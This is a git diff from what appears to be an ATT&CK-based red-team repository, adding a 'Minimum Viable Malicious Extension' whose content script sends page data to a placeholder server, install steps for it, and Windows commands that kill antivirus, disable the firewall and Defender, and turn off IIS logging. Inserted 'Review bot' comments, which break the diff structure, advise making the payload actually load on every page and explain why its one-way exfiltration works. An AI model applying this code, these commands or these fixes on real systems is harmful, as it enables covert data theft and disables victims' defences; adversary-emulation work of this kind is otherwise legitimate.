diff --git a/Linux/Collection/Browser_Extensions.md b/Linux/Collection/Browser_Extensions.md
new file mode 100644
index 0000000..3550fb8
--- /dev/null
+++ b/Linux/Collection/Browser_Extensions.md
@@ -0,0 +1,24 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome (Developer Mode)
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
+
+### Chrome (Chrome Web Store)
+
+Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
+
+### Firefox
+
+Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
+
+Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
+
+Then click 'Open'
\ No newline at end of file
diff --git a/Linux/Payloads/Browser_Extension/inline.js b/Linux/Payloads/Browser_Extension/inline.js
new file mode 100644
index 0000000..15a8e4c
--- /dev/null
+++ b/Linux/Payloads/Browser_Extension/inline.js
@@ -0,0 +1,37 @@
+function exfil(str) {
+ // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
+ // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
+ // and probably a thousand other methods. But this one is easy.
+ var buffer = new TextEncoder("utf-8").encode(str);
+ return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
+}
+
+function callUrl(buffer) {
+ // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
+ // except it's example.com so w/e
+ var digest = hex(buffer);
+ var url = "https://example.com/" + digest;
+ console.log("Exfiltrating data to " + url)
+ var xmlHttp = new XMLHttpRequest();
+ xmlHttp.open( "GET", url, true);
+ xmlHttp.send( null);
+ return digest;
+}
+
+function hex(buffer) {
+ // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
+ var hexCodes = [];
+ var view = new DataView(buffer);
+ for (var i = 0; i < view.byteLength; i += 4) {
+ var value = view.getUint32(i)
+ var stringValue = value.toString(16)
+ var padding = '00000000'
+ var paddedValue = (padding + stringValue).slice(-padding.length)
+ hexCodes.push(paddedValue);
+ }
+ var athing = hexCodes.join("");
+ return hexCodes.join("");
+}
+
+// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
+var digest = exfil(document.title);
\ No newline at end of file
diff --git a/Linux/Payloads/Browser_Extension/manifest.json b/Linux/Payloads/Browser_Extension/manifest.json
new file mode 100644
index 0000000..a4243cb
--- /dev/null
+++ b/Linux/Payloads/Browser_Extension/manifest.json
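Review bot: `exfil` dereferences `crypto.subtle` unconditionally, but this content script runs on whatever pages the manifest matches, and on a plain http:// document `crypto.subtle` is undefined in current browsers (SubtleCrypto is a secure-context API), so the final `var digest = exfil(document.title);` throws a TypeError there instead of returning a promise, and a rejected digest promise is never handled either. Guard the call and terminate the chain: `if (!(window.crypto && window.crypto.subtle)) { console.warn("SubtleCrypto unavailable; skipping exfil"); } else { exfil(document.title).catch(function (err) { console.error("exfil failed", err); }); }`. The file-scope name `digest` is misleading because it holds a Promise, not the hex string that `callUrl` returns; `pending`, or no binding at all, would be clearer. In `hex`, `var athing = hexCodes.join("");` is dead code and should be removed, and the `"utf-8"` argument to `TextEncoder` is ignored by the spec and can be dropped.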
@@ -0,0 +1,16 @@
+{
+ "name": "Minimum Viable Malicious Extension",
+ "description": "Base Level Extension",
+ "version": "1.0",
+ "manifest_version": 2,
+ "content_scripts": [
+ {
+ "matches": [
+ ""
+ ],
+ "js": [
+ "inline.js"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md
new file mode 100644
index 0000000..3550fb8
--- /dev/null
+++ b/Linux/Persistence/Browser_Extensions.md
@@ -0,0 +1,24 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome (Developer Mode)
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
+
+### Chrome (Chrome Web Store)
+
+Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
+
+### Firefox
+
+Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
+
+Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
+
+Then click 'Open'
\ No newline at end of file
diff --git a/Linux/README.md b/Linux/README.md
index 825187f..504087b 100644
--- a/Linux/README.md
+++ b/Linux/README.md
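Review bot: `"matches": [""]` is not a valid match pattern, so Chrome refuses to load the unpacked extension with an invalid-manifest error (Firefox's temporary add-on load most likely rejects it as well), which means the payload as committed never injects inline.js anywhere. Since inline.js hashes `document.title` from whatever page it lands on, the intended value is presumably every page, `"matches": ["<all_urls>"]`; it is worth checking whether the angle-bracket token was stripped somewhere between the author's editor and this diff, and a scoped engagement may prefer explicit `https://*/*`-style patterns instead. There is also no `permissions` key, so under Manifest V2 the cross-origin XMLHttpRequest in inline.js is governed by the host page's origin: a simple GET still leaves the browser and reaches the attacker's server with the hash in the path, but the response is opaque, which is adequate for one-way exfil and should be stated in the accompanying README rather than left implicit.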
@@ -4,14 +4,14 @@ |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | | Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media | -| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy | -| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | -| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | 
-| Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | -| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | -| Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels | -| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels | -| | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication | +| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | +| [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol | +| Hidden Files and Directories | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom 
Cryptographic Protocol | +| Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | +| Redundant Access | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Trap](Persistence/Trap.md) | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Data from Removable Media | Exfiltration Over Physical Medium | Fallback Channels | +| Valid Accounts | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Input Capture | Scheduled Transfer | Multi-Stage Channels | +| Web Shell | | Install Root Certificate | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication | | | | Masquerading | | | | | | | Multilayer Encryption | | | | Redundant Access | | | | | | | Remote File Copy | | | | Scripting | | | | | | | Standard Application Layer Protocol |
diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md
new file mode 100644
index 0000000..3550fb8
--- /dev/null
+++ b/Mac/Collection/Browser_Extensions.md
@@ -0,0 +1,24 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome (Developer Mode)
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
+
+### Chrome (Chrome Web Store)
+
+Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
+
+### Firefox
+
+Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
+
+Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
+
+Then click 'Open'
\ No newline at end of file
diff --git a/Mac/Payloads/Browser_Extension/inline.js b/Mac/Payloads/Browser_Extension/inline.js
new file mode 100644
index 0000000..15a8e4c
--- /dev/null
+++ b/Mac/Payloads/Browser_Extension/inline.js
@@ -0,0 +1,37 @@
+function exfil(str) {
+ // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
+ // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
+ // and probably a thousand other methods. But this one is easy.
+ var buffer = new TextEncoder("utf-8").encode(str);
+ return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
+}
+
+function callUrl(buffer) {
+ // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
+ // except it's example.com so w/e
+ var digest = hex(buffer);
+ var url = "https://example.com/" + digest;
+ console.log("Exfiltrating data to " + url)
+ var xmlHttp = new XMLHttpRequest();
+ xmlHttp.open( "GET", url, true);
+ xmlHttp.send( null);
+ return digest;
+}
+
+function hex(buffer) {
+ // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
+ var hexCodes = [];
+ var view = new DataView(buffer);
+ for (var i = 0; i < view.byteLength; i += 4) {
+ var value = view.getUint32(i)
+ var stringValue = value.toString(16)
+ var padding = '00000000'
+ var paddedValue = (padding + stringValue).slice(-padding.length)
+ hexCodes.push(paddedValue);
+ }
+ var athing = hexCodes.join("");
+ return hexCodes.join("");
+}
+
+// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
+var digest = exfil(document.title);
\ No newline at end of file
diff --git a/Mac/Payloads/Browser_Extension/manifest.json b/Mac/Payloads/Browser_Extension/manifest.json
new file mode 100644
index 0000000..a4243cb
--- /dev/null
+++ b/Mac/Payloads/Browser_Extension/manifest.json
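Review bot: The top-level `var digest = exfil(document.title);` has no rejection handler and `exfil` reaches for `crypto.subtle` without checking it exists; on a non-secure (http://) page current browsers leave `crypto.subtle` undefined, so the script dies with an unhandled TypeError rather than quietly doing nothing. Wrap the entry point: `if (!(window.crypto && window.crypto.subtle)) { console.warn("SubtleCrypto unavailable; skipping exfil"); } else { exfil(document.title).catch(function (err) { console.error("exfil failed", err); }); }`. Note that `digest` at file scope is a Promise, whereas the `digest` inside `callUrl` is the hex string, so one of them deserves a different name. `var athing = hexCodes.join("");` in `hex` is unused and should go, and `new TextEncoder("utf-8")` can be `new TextEncoder()` since the label argument is ignored.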
@@ -0,0 +1,16 @@
+{
+ "name": "Minimum Viable Malicious Extension",
+ "description": "Base Level Extension",
+ "version": "1.0",
+ "manifest_version": 2,
+ "content_scripts": [
+ {
+ "matches": [
+ ""
+ ],
+ "js": [
+ "inline.js"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/Mac/Persistence/Browser_Extensions.md b/Mac/Persistence/Browser_Extensions.md
new file mode 100644
index 0000000..3550fb8
--- /dev/null
+++ b/Mac/Persistence/Browser_Extensions.md
@@ -0,0 +1,24 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome (Developer Mode)
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
+
+### Chrome (Chrome Web Store)
+
+Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
+
+### Firefox
+
+Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
+
+Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
+
+Then click 'Open'
\ No newline at end of file
diff --git a/Mac/README.md b/Mac/README.md
index 141b637..64fab2b 100644
--- a/Mac/README.md
+++ b/Mac/README.md
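Review bot: The content script's `"matches"` array holds an empty string, which is not a match pattern; Chrome rejects the manifest at load time and the extension never installs, so nothing in inline.js runs. The write-up describes a script that fires on any page, which corresponds to `"matches": ["<all_urls>"]`; if that token was present in the author's file and lost in rendering, the committed copy should be checked, and an engagement that needs to stay in scope may prefer explicit `https://*/*`-style patterns. The manifest also declares no `permissions`, so in the Manifest V2 model the cross-origin GET issued from inline.js runs under the host page's origin: the request still reaches the attacker's server with the hash in the path, but the response is opaque, which is sufficient for one-way exfil and worth documenting.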
@@ -3,7 +3,7 @@ | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | |------------------------------|-------------------------------|---------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | -| Browser Extensions | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | +| [Browser Extensions](Persistence/Browser_Extensions.md) | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | | [Create Account](Persistence/Create_Account.md) | Launch Daemon | Code Signing | Credentials in Files | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Browser Extensions | Data Encrypted | Connection Proxy | | Dylib Hijacking | Plist Modification | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Exploitation of 
Vulnerability | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | [Logon Scripts](Persistence/Logon_Scripts.md) | Launchctl | Clipboard Data | Data Transfer Size Limits | [Custom Command and Control Protocol](Command_and_Control/Custom_Command_and_Control_Protocol.md) | | Hidden Files and Directories | Process Injection | Exploitation of Vulnerability | Input Capture | [Network Share Discovery](Discovery/Network_Share_Discovery.md) | Remote File Copy | Local Job Scheduling | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
diff --git a/Windows/Collection/Browser_Extensions.md b/Windows/Collection/Browser_Extensions.md
new file mode 100644
index 0000000..3550fb8
--- /dev/null
+++ b/Windows/Collection/Browser_Extensions.md
@@ -0,0 +1,24 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome (Developer Mode)
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
+
+### Chrome (Chrome Web Store)
+
+Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
+
+### Firefox
+
+Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
+
+Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
+
+Then click 'Open'
\ No newline at end of file
diff --git a/Windows/Defense_Evasion/Disabling_Security_Tools.md b/Windows/Defense_Evasion/Disabling_Security_Tools.md
new file mode 100644
index 0000000..4d4d51f
--- /dev/null
+++ b/Windows/Defense_Evasion/Disabling_Security_Tools.md
@@ -0,0 +1,28 @@
+# Disabling Security Tools
+
+MITRE ATT&CK Technique: [T1089](https://attack.mitre.org/wiki/Technique/T1089)
+
+## Terminate Anti-Virus Processes
+`Taskkill /F /IM avprocess.exe`
+
+## Disable Firewall
+`netsh firewall set opmode disable`
+
+## Stop Windows Security Center
+`net stop wscsvc`
+
+## Stop Windows Defender
+
+### Windows 7/8
+`net stop windefend`
+
+### Windows 10
+`PS > Set-MpPreference -DisableRealtimeMonitoring $true`
+
+## Disable Default Web Site Logging IIS 7
+
+### Disable Default Web Site Logging IIS 7
+`%windir%\system32\inetsrv\appcmd.exe set config "Default Web Site" -section:system.webServer/httpLogging /dontLog:"True" /commit:apphost`
+
+### Restart Default Web Site IIS 7
+`%windir%\system32\inetsrv\appcmd.exe stop site /site.name:"Default Web Site" && %windir%\system32\inetsrv\appcmd.exe start site /site.name:"Default Web Site"`
diff --git a/Windows/Payloads/Browser_Extension/inline.js b/Windows/Payloads/Browser_Extension/inline.js
new file mode 100644
index 0000000..15a8e4c
--- /dev/null
+++ b/Windows/Payloads/Browser_Extension/inline.js
@@ -0,0 +1,37 @@
+function exfil(str) {
+ // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
+ // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
+ // and probably a thousand other methods. But this one is easy.
+ var buffer = new TextEncoder("utf-8").encode(str);
+ return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
+}
+
+function callUrl(buffer) {
+ // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
+ // except it's example.com so w/e
+ var digest = hex(buffer);
+ var url = "https://example.com/" + digest;
+ console.log("Exfiltrating data to " + url)
+ var xmlHttp = new XMLHttpRequest();
+ xmlHttp.open( "GET", url, true);
+ xmlHttp.send( null);
+ return digest;
+}
+
+function hex(buffer) {
+ // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
+ var hexCodes = [];
+ var view = new DataView(buffer);
+ for (var i = 0; i < view.byteLength; i += 4) {
+ var value = view.getUint32(i)
+ var stringValue = value.toString(16)
+ var padding = '00000000'
+ var paddedValue = (padding + stringValue).slice(-padding.length)
+ hexCodes.push(paddedValue);
+ }
+ var athing = hexCodes.join("");
+ return hexCodes.join("");
+}
+
+// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
+var digest = exfil(document.title);
\ No newline at end of file
diff --git a/Windows/Payloads/Browser_Extension/manifest.json b/Windows/Payloads/Browser_Extension/manifest.json
new file mode 100644
index 0000000..a4243cb
--- /dev/null
+++ b/Windows/Payloads/Browser_Extension/manifest.json
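Review bot: `exfil` assumes `crypto.subtle` is present, yet a content script is injected into whatever the manifest matches, and on a plain http:// document current browsers do not expose `crypto.subtle` (secure-context only), so the closing `var digest = exfil(document.title);` throws a TypeError and the promise chain it would otherwise start has no `.catch`. Guard and terminate it: `if (!(window.crypto && window.crypto.subtle)) { console.warn("SubtleCrypto unavailable; skipping exfil"); } else { exfil(document.title).catch(function (err) { console.error("exfil failed", err); }); }`. Reusing the name `digest` for both the Promise at file scope and the hex string inside `callUrl` invites confusion; rename the outer one or drop the binding, since nothing reads it. `var athing = hexCodes.join("");` in `hex` is dead code, and the ignored `"utf-8"` label on `TextEncoder` can be removed.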
@@ -0,0 +1,16 @@
+{
+ "name": "Minimum Viable Malicious Extension",
+ "description": "Base Level Extension",
+ "version": "1.0",
+ "manifest_version": 2,
+ "content_scripts": [
+ {
+ "matches": [
+ ""
+ ],
+ "js": [
+ "inline.js"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/Windows/Persistence/Browser_Extensions.md b/Windows/Persistence/Browser_Extensions.md
new file mode 100644
index 0000000..3550fb8
--- /dev/null
+++ b/Windows/Persistence/Browser_Extensions.md
@@ -0,0 +1,24 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome (Developer Mode)
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
+
+### Chrome (Chrome Web Store)
+
+Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
+
+### Firefox
+
+Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
+
+Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
+
+Then click 'Open'
\ No newline at end of file
diff --git a/Windows/README.md b/Windows/README.md
index 1228cf4..54807d3 100644
--- a/Windows/README.md
+++ b/Windows/README.md
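Review bot: `"matches": [""]` will not pass Chrome's manifest validation (an empty string has no scheme or host), so the 'Load unpacked extension...' step in the accompanying write-up fails and inline.js is never injected. The intended pattern for a script that hashes `document.title` on arbitrary pages is `"matches": ["<all_urls>"]`; confirm whether that token was dropped between the author's file and this diff, and consider narrower `https://*/*`-style patterns when the engagement scope calls for it. Without a `permissions` array the cross-origin GET from inline.js is subject to the host page's CORS rules under Manifest V2: the request still goes out and the attacker's server receives the hash in the path, but the response is unreadable, which is enough for fire-and-forget exfil and should be noted for anyone extending the payload.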
@@ -4,14 +4,14 @@ |-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | | AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | Dynamic Data Exchange | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | -| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | Browser Extensions | Data Encrypted | Connection Proxy | +| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | | [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs 
| Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | Logon Scripts | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol | | [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | -| Browser Extensions | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | | [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | | Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query 
Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels | -| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | Disabling Security Tools | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | +| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | | [Create Account](Credential_Access/Create_Account.md) | Hooking | Exploitation of Vulnerability | Password Filter DLL | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Man in the Browser | | Multi-hop Proxy | | DLL Search Order Hijacking | Image File Execution Options Injection | Extra Window Memory Injection | Private Keys | [System Information Discovery](Discovery/System_Information_Discovery.md) | Taint Shared Content | [Rundll32](Execution/rundll32.md) | Screen Capture | | Multiband Communication | | External Remote Services | [New Service](Persistence/New_Service.md) | [File Deletion](Defense_Evasion/File_Deletion.md) | Replication Through Removable Media | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | Third-party Software | Scheduled Task | Video Capture | | Multilayer Encryption |